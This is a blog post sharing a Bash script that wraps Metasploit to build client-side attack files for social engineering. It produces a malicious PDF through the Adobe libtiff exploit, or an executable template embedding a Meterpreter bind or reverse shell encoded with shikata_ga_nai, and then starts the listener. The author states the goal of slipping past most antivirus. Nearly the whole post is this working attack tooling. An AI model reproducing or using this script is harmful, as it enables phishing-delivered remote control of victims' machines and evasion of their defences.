Friday, August 26, 2011

Bash Scripts

I have been practicing more Metasploit and Bash scripting.  I came up with a quick script for client-side exploits.  It is not mind-blowing or anything, but it is nice for quickly producing a file to use with social engineering (SE). It encodes enough to get past most AV and will start the multi handler to accept incoming/outgoing connections.  I am sure I will add to it later, but this is just a starting point.  Have to start somewhere....



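#!/bin/sh
#
# Interactive wrapper that asks a few questions and then runs msfcli/msfvenom
# to create a Meterpreter test file (PDF or EXE) and start
# exploit/multi/handler with the matching payload options.
#
# Input:  answers read from stdin (file type, payload, host, port, file name).
# Output: a PDF under /root/pdf_metasploit/, or /root/Desktop/bind.exe or
#         /root/Desktop/reverse.exe. The EXE paths are fixed, so a second run
#         overwrites the previous file.
# Exit:   1 when an answer fails validation; otherwise the status of the
#         last command run.
#
# Shell notes:
#   - The comparisons use "=" and quoted expansions. "==" inside [ ] is a
#     bashism that fails when /bin/sh is dash, and an unquoted empty answer
#     makes [ ] error out instead of reaching the "not recognized" branch.
#   - Port, host and file-name answers are validated before they are placed
#     on a command line or appended to a directory, so a stray "/" or ".."
#     cannot point the tool outside the intended folders.
#
# NOTE(review): x86/shikata_ga_nai output is commonly signatured by AV/EDR
# products, so the encoded file should be expected to trigger detections;
# that makes it useful for exercising them, not for assuming it goes unseen.

PDF_DIR=/root/pdf_metasploit
TEMPLATE_DIR=/root/exe_template
OUT_DIR=/root/Desktop

# Print the message used for every answer the script does not understand.
unrecognized() {
    echo "Did not recognize you response. Please run script again. "
}

# Report a validation failure on stderr and stop.
die() {
    printf '%s\n' "$*" >&2
    exit 1
}

# Print prompt $1 and read one line into $reply (empty on EOF).
# -r keeps backslashes literal; default IFS still trims surrounding blanks.
ask() {
    echo "$1"
    read -r reply || reply=
}

# Accept only a decimal port in 1..65535.
check_port() {
    case "$1" in
        '' | *[!0-9]*) die "Port must be a number between 1 and 65535." ;;
    esac
    # Length cap keeps the numeric test away from integer overflow.
    if [ "${#1}" -gt 5 ] || [ "$1" -lt 1 ] || [ "$1" -gt 65535 ]; then
        die "Port must be a number between 1 and 65535."
    fi
}

# Accept only characters that can appear in an IP address or host name.
check_host() {
    case "$1" in
        '' | *[!A-Za-z0-9.:_-]*) die "Host must be an IP address or host name." ;;
    esac
}

# Accept only a plain file name: no directory part, not "." or "..".
check_name() {
    case "$1" in
        '' | . | .. | */*) die "File name must not be empty or contain '/'." ;;
    esac
}

# PDF path: build the adobe_libtiff file, then start the handler.
build_pdf() {
    ask "What is the pdf payload, bind_tcp or reverse_tcp?"
    payload=$reply
    echo "Remember: This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions 8.0 through 8.2 and 9.0 through 9.3."

    case "$payload" in
        bind_tcp)
            host_opt=RHOST
            ask "What is the rhost IP address?"
            ;;
        reverse_tcp)
            host_opt=LHOST
            ask "What is the lhost IP address?"
            ;;
        *)
            unrecognized
            return 0
            ;;
    esac
    host=$reply
    check_host "$host"

    ask "What is the port we will bind to?"
    port=$reply
    check_port "$port"

    ls "$PDF_DIR/"
    ask "What name do you want to use for the PDF?"
    pdf_file=$reply
    check_name "$pdf_file"

    msfcli exploit/windows/fileformat/adobe_libtiff \
        "FILENAME=$PDF_DIR/$pdf_file" \
        "PAYLOAD=windows/meterpreter/$payload" \
        "LPORT=$port" "$host_opt=$host" E
    msfcli exploit/multi/handler \
        "PAYLOAD=windows/meterpreter/$payload" \
        "LPORT=$port" "$host_opt=$host" E
}

# EXE path: embed the payload in a chosen template, then start the handler.
build_exe() {
    ask "Do you want the file to execute the payload in a separate process? Yes or No?"
    case "$reply" in
        Yes | yes) separate=yes ;;
        No | no) separate=no ;;
        *)
            unrecognized
            return 0
            ;;
    esac

    ask "What is the exe payload, bind_tcp or reverse_tcp?"
    payload=$reply
    case "$payload" in
        bind_tcp)
            host_opt=RHOST
            ask "What is the rhost IP address?"
            host=$reply
            ask "What is the port we will bind to?"
            ;;
        reverse_tcp)
            host_opt=LHOST
            ask "What is the lhost IP address?"
            host=$reply
            ask "What is the port we will connect to?"
            ;;
        *)
            unrecognized
            return 0
            ;;
    esac
    port=$reply
    check_host "$host"
    check_port "$port"

    ls "$TEMPLATE_DIR/"
    ask "Which exe template do you want to use?"
    exefile=$reply
    check_name "$exefile"
    [ -f "$TEMPLATE_DIR/$exefile" ] || die "Template not found: $TEMPLATE_DIR/$exefile"

    # Build the msfvenom argument list in "$@" so each value stays one word.
    set -- -p "windows/meterpreter/$payload" -f exe \
        -e x86/shikata_ga_nai -b '\x00\x20' -i 18 "LPORT=$port"
    # Only the reverse payload is given a host at build time; the bind
    # variant gets RHOST on the handler only, as in the original commands.
    if [ "$payload" = reverse_tcp ]; then
        set -- "$@" "LHOST=$host"
    fi
    # -k is the "separate process" choice from the first question.
    if [ "$separate" = yes ]; then
        set -- "$@" -k
    fi
    set -- "$@" -x "$TEMPLATE_DIR/$exefile"

    # bind_tcp -> bind.exe, reverse_tcp -> reverse.exe
    msfvenom "$@" > "$OUT_DIR/${payload%_tcp}.exe"
    msfcli exploit/multi/handler \
        "PAYLOAD=windows/meterpreter/$payload" \
        "LPORT=$port" "$host_opt=$host" E
}

ask "Do you need a pdf or exe 'special' payload?"
special=$reply
case "$special" in
    pdf) build_pdf ;;
    exe) build_exe ;;
    *) unrecognized ;;
esac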
